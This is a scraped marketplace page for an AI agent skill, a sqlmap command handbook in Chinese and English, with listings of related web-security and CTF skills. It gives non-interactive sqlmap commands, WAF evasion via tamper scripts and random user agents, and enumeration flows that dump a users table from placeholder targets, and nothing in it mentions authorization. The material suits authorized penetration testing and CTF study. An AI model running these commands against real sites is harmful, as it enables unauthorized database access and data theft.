con un clic
strix-sqlmap
Strix sqlmap 命令手册,覆盖目标语法、无交互执行与常见枚举流程;触发名:strix-sqlmap
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Menú
Strix sqlmap 命令手册,覆盖目标语法、无交互执行与常见枚举流程;触发名:strix-sqlmap
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Basado en la clasificación ocupacional SOC
面向中文用户和新手的统一入口,保持原有两种模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想先理清题意、又不想自己先判断何时该切到工具链或漏洞专项的场景;触发名:ctf-beginner-hub
面向 CTF 新手与综合题的统一总控 skill。保持原有两种主模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想边做边学、又不想自己先判断何时切换到工具链或漏洞专项的场景;触发名:ctf-super-hub
Strix JWT 与 OIDC 安全测试手册,覆盖令牌伪造、算法混淆与声明篡改;触发名:strix-authentication-jwt
给中文用户和新手用的 Strix Lite 统一入口:先判断该用哪一个 strix-* 工具或漏洞测试 skill,再给最小化起手步骤;适合在 Web 安全测试、工具链使用、漏洞验证时不知道先用哪个 Strix skill 的场景;触发名:strix-beginner-hub
Strix 功能级授权缺陷测试手册,覆盖操作级权限失效、管理功能越权与 API 操作绕过;触发名:strix-broken-function-level-authorization
Strix 业务逻辑漏洞测试手册,覆盖流程绕过、状态操控与领域约束破坏;触发名:strix-business-logic
| name | Strix•sqlmap 用法 |
| description | Strix sqlmap 命令手册,覆盖目标语法、无交互执行与常见枚举流程;触发名:strix-sqlmap |
Official docs:
Canonical syntax:
sqlmap -u "<target_url_with_params>" [options]
High-signal flags:
-u, --url <url> target URL-r <request_file> raw HTTP request input-p <param> test specific parameter(s)--batch non-interactive mode--level <1-5> test depth--risk <1-3> payload risk profile--threads <n> concurrency--technique <letters> technique selection--forms parse and test forms from target page--cookie <cookie> and --headers <headers> authenticated context--timeout <seconds> and --retries <n> transport stability--tamper <scripts> WAF/input-filter evasion--random-agent randomize user-agent--ignore-proxy bypass configured proxy--dbs, -D <db> --tables, -D <db> -T <table> --columns, -D <db> -T <table> -C <cols> --dump--flush-session clear cached scan stateAgent-safe baseline for automation:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5 --timeout 10 --retries 1 --random-agent
Common patterns:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5sqlmap -u "https://target.tld/login" --data "user=admin&pass=test" -p pass --batch --level 2 --risk 1sqlmap -u "https://target.tld/login" --forms --batch --level 2 --risk 1 --random-agentsqlmap -u "https://target.tld/item?id=1" -p id --batch --dbssqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb --tablessqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb -T users -C id,email,role --dumpCritical correctness rules:
--batch in automation to avoid interactive prompts.-p when possible.--flush-session when retesting after request/profile changes.--level 1-2, --risk 1) and escalate only when needed.Usage rules:
--cookie/--headers) aligned with manual validation state.-D/-T/-C) over broad dump-first behavior.-h/--help during normal execution unless absolutely necessary.Failure recovery:
--flush-session.--threads and test targeted --tamper chains.--level/--risk gradually.If uncertain, query web_search with:
site:github.com/sqlmapproject/sqlmap/wiki/usage sqlmap <flag>